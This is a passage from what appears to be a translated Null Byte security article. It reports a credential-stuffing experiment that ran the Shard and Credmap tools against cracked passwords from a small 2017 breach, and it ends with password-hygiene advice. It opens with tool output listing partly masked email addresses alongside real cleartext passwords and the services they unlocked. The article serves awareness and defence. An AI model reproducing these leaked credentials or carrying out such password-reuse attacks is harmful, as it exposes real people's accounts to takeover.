[+] *******@aim.com:thisisme - BitBucket
[+] *******@gmail.com:dacheng198 - BitBucket
[+] *******@GMAIL.COM:BASSETT92 - BitBucket
[+] *******@gmail.com:123456 - BitBucket
[+] *******@hotmail.com:syndrom02 - Twitter, BitBucket
[+] *******@gmail.com:bronco999 - BitBucket
[+] *******@hotmail.com:metallica4224 - Twitter
[+] *******@gmail.com:rawtheme22 - Twitter
[+] *******@gmail.com:sobaked123 - BitBucket
[+] *******@gmail.com:Thee1234 - BitBucket
[+] *******@hotmail.ca:0230176 - BitBucket
[+] *******@gmail.com:19722791 - BitBucket
[+] *******@gmail.com:indonesia2016 - BitBucket
[+] *******@live.co.uk:01cs653 - Facebook, BitBucket
[+] *******@gmail.com:Battlefield710 - Twitter, BitBucket
[+] *******@gmail.com:Supaman1 - Facebook
[+] *******@hotmail.com:Bigdick*12 - BitBucket
[+] *******@outlook.com:darkstar1 - BitBucket
[+] *******@web.de:gt9800 - BitBucket
[+] *******@yahoo.com:mvp123 - Twitter
[+] *******@yahoo.com:arturi09 - BitBucket
[+] *******@gmail.com:092486 - BitBucket
[+] *******@hotmail.com:sappeps12345 - BitBucket
[+] *******@yahoo.com:1morerep - Twitter, BitBucket
[+] *******@cox.net:joiedevivre - BitBucket
[+] *******@gmail.com:23vec4rPcC - BitBucket

Después de ejecutar el comando Shard, se informó que un total de 219 cuentas de Twitter, Facebook, BitBucket y Kijiji usaban exactamente las mismas combinaciones de nombre de usuario: contraseña. Curiosamente, esta vez no hubo detecciones de Reddit.

Los resultados de Shard determinaron que 166 cuentas de BitBucket se vieron comprometidas con este ataque de reutilización de contraseñas, que es inconsistente con la detección de BitBucket de 111 cuentas de Credmap. Tanto Crepmap como Shard no se han actualizado desde 2016 y sospecho que los resultados de BitBucket son en su mayoría (si no del todo) falsos positivos. Es posible que BitBucket haya alterado sus parámetros de inicio de sesión desde 2016 y haya eliminado la capacidad de Credmap y Shard para detectar un intento de inicio de sesión verificado.

Los piratas informáticos motivados pueden descifrar aún más contraseñas

En total (omitiendo los datos de BitBucket), las cuentas comprometidas consistían en 61 de Twitter, 52 de Reddit, 17 de Facebook, 29 de Scribd, 23 de Microsoft y un puñado de Foursquare, Wunderlist y Kijiji. Aproximadamente 200 cuentas en línea comprometidas como resultado de una pequeña violación de datos en 2017.

Y tenga en cuenta que ni Credmap ni Shard verifican la reutilización de contraseñas en Gmail, Netflix, iCloud, sitios web bancarios o sitios web más pequeños que probablemente contengan información personal como La mejor compra, Macy’s y compañías aéreas.

Si se actualizaran las detecciones de Credmap y Shard, y si hubiera dedicado más tiempo a descifrar el 57% restante de hashes, los resultados serían mejores. Con muy poco esfuerzo y tiempo, un atacante es capaz de comprometer cientos de cuentas en línea utilizando solo una pequeña filtración de datos que consta de 1.100 direcciones de correo electrónico y contraseñas hash.

Un atacante motivado con 8 millones o 26 millones Los conjuntos de datos únicos podrían causar una gran destrucción en miles de cuentas en línea.

No ignore las violaciones de datos …

Si no desea que sus nombres de usuario y contraseñas aparezcan en ninguna de estas bases de datos filtradas, hay algunas cosas obvias que puede hacer:

  • Cambie sus contraseñas. Ahora. Y hazlos fuertes. Utilice un administrador de contraseñas adecuado como KeePassX o Ultimo pase para almacenar todos sus datos confidenciales. Tómese una tarde y restablezca todas sus contraseñas, incluso las pequeñas cuentas de juego en las que olvidó que se registró.
  • Presta atención. Manténgase actualizado con violaciones de datos a medida que suceden. Hay muchos medios de comunicación de renombre que ofrecen noticias relacionadas con hackers como ocurre.
  • Reaccionar. Cuando ocurran violaciones de datos, no las ignore. Si alguna vez ha estado afiliado al sitio web afectado por una infracción, cambie su contraseña de inmediato. Si ya no usa la cuenta o no la necesita absolutamente, elimínela. No crea que un sitio web es demasiado pequeño para verse comprometido. Un pirata informático puede cambiar fácilmente de una cuenta pequeña a su dirección de correo electrónico principal. Es posible.

Hasta la próxima, sígueme en Twitter. @tokyoneon_ y GitHub. Y como siempre, deje un comentario a continuación o envíeme un mensaje en Twitter si tiene alguna pregunta.

Foto de portada de Justin Meyers / Null Byte

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba
Cerrar